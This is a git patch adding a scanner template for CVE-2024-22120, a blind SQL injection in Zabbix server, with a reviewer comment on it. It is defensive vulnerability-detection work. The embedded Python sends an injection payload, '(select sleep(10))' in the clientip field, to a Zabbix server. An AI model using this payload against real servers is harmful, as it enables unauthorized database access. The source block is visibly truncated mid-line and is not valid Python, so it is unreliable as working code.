From a1e77eded0616bb2e8301893a040ba56a14ea5ec Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 3 Sep 2024 15:22:25 +0400
Subject: [PATCH] Create CVE-2024-22120.yaml
---
code/cves/2024/CVE-2024-22120.yaml | 56 ++++++++++++++++++++++++++++++
1 file changed, 56 insertions(+)
create mode 100644 code/cves/2024/CVE-2024-22120.yaml
diff --git a/code/cves/2024/CVE-2024-22120.yaml b/code/cves/2024/CVE-2024-22120.yaml
new file mode 100644
index 0000000000..ed19e816db
--- /dev/null
+++ b/code/cves/2024/CVE-2024-22120.yaml
@@ -0,0 +1,56 @@
+id: CVE-2024-22120
+
+info:
+ name: Zabbix Server - Time-Based Blind SQL injection
+ author: CodeStuffBreakThings
+ severity: critical
+ description: |
+ The Zabbix server can execute commands for configured scripts. After executing a command, an audit entry is added to the "Audit Log". Due to the "clientip" field not being sanitized, it is possible to inject SQL into "clientip" and exploit a time-based blind SQL injection vulnerability.
+ remediation: |
+ Fixed in versions 6.0.28rc1, 6.4.13rc1, 7.0.0beta2
+ reference:
+ - https://support.zabbix.com/browse/ZBX-24505#/
+ - https://github.com/W01fh4cker/CVE-2024-22120-RCE
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-22120
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 9.1
+ cve-id: CVE-2024-22120
+ tags: zabbix,sqli,cve,cve2024,authenticated
+
+variables:
+ HOST: "{{Host}}"
+ PORT: "{{Port}}"
+ SID: "{{SID}}"
+ HOSTID: "{{HOSTID}}"
+
+code:
+ - engine:
+ - py
+ - python3
+ source: |
+ import os, struct, socket
+ from datetime import datetime
+ hostname=os.getenv('HOST')
+ port=int(os.getenv('PORT'))
+ sid=os.getenv('SID')
+ hostid=os.getenv('HOSTID')
+ zbx_header = "ZBXD\x01".encode()
+ message_json = "{\"request\": \"command\", \"sid\": \"" + sid + "\", \"scriptid\": \"3\", \"clientip\": \"' + (select sleep(10)) + '\", \"hostid\": \"" + hostid + "\"}"
+ message_length = struct.pack('= 10 and zbx_header in response:
+ print("Vulnerable to CVE-2024-22120")
+
+ matchers:
+ - type: word
+ words:
+ - "Vulnerable to CVE-2024-22120"
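Review bot: The `source:` block of the new template is truncated as rendered here — `message_length = struct.pack('` runs straight into `= 10 and zbx_header in response:` — so the length packing, the socket send/receive and the elapsed-time comparison cannot be reviewed, and the code as shown is not valid Python; confirm the committed file is intact. What is visible warrants two caveats worth recording in `description`: the probe `(select sleep(10))` is MySQL-specific, so a PostgreSQL-backed Zabbix server will yield a false negative, and a verdict based only on elapsed time reaching 10 seconds can also be produced by a slow or stalled connection, so a `socket.settimeout()` bounding the read and a baseline request without the delay would make the result more reliable. `int(os.getenv('PORT'))` raises a bare `TypeError` if `PORT` is unset, and `SID`/`HOSTID` carry no defaults, so a comment above `variables:` such as `# SID: a valid Zabbix session id; HOSTID: a host that session may run scripts on — both must be supplied at run time` would spare users a confusing failure.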